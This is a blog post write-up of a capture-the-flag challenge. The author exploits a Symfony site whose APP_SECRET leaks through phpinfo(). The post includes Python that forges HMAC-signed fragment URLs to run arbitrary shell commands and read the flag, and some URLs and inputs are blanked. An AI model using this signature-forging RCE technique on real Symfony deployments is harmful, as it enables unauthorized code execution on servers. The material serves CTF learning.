Symphony writeup
Posted on Mon 14 March 2022 in ctf
If we inspect the website at the given link we can see that is displays the output of phpinfo()
Further down in the page we see two interesting environment variables APP_SECRET
This indicated that the page is built with Symphony.
After some googling I found the following blog post that describes a way to gain remote code execution in Symphony based websites.
Testing for vulnerability
To test whether we can apply this exploit or not we open which returns the expected HTTP 403.
Calculate valid signature
As described in the blog post we calculate the proper HMAC with the exposed APP_SECRET
and the URL we want to access:
# APP_SECRET exposed from phpinfo: 60b938ad59ac73568c7f2d6c282cd084
# calculate HMAC with secret and URL
import base64, hmac, hashlib
print(base64.b64encode(hmac.HMAC(b'60b938ad59ac73568c7f2d6c282cd084', b'', hashlib.sha256).digest()))
# b'fyV4XdLD0haRSGyIJA4CMbbai6jSknB09Tk+CE2/i/k='
# add calculated HMAC to request
# url encode
Now the webserver returns HTTP 404 instead of 403:
Remote code execution
We now know that we can properly calculate the HMAC so we try to run some code on the server:
# calculate HMAC for call to system("id", null) which would be called with
import base64, hmac, hashlib
print(base64.b64encode(hmac.HMAC(b'60b938ad59ac73568c7f2d6c282cd084', b'', hashlib.sha256).digest()))
# b'KMwS5Oc86Op3T32GVDjKUlzlRcWrqAkXP/HpBI50WiE='
# Append hash to url
We can see the result of running id by calling system($command)
Retrieving the flag
Now let's use find to find the flag. Using the following script we can generate URLs for running arbitrary commands on the server:
import base64, hmac, hashlib
import urllib.parse
appSecret = b'60b938ad59ac73568c7f2d6c282cd084'
baseUrl = ''
command = "system&command=find%20%2F%20-name%20flag.%2A&return_value=null"
fullUrl = baseUrl + urllib.parse.quote(command)
hash = base64.b64encode(hmac.HMAC(b'60b938ad59ac73568c7f2d6c282cd084', fullUrl.encode('UTF-8'), hashlib.sha256).digest())
print(fullUrl + '&_hash=' + urllib.parse.quote(hash))
This gives us the URL
which reveals the flag
So we create a new URL by replacing the command with "system&command=cat%20%2Fvar%2Fwww%2Fhtml%2Fchall%2Fflag.txt%20&return_value=null"
The new URL is
Entering this URL in the browser gives us the flag dvCTF{1c5b0abc99b19effaacd1aa7d6ec28f8}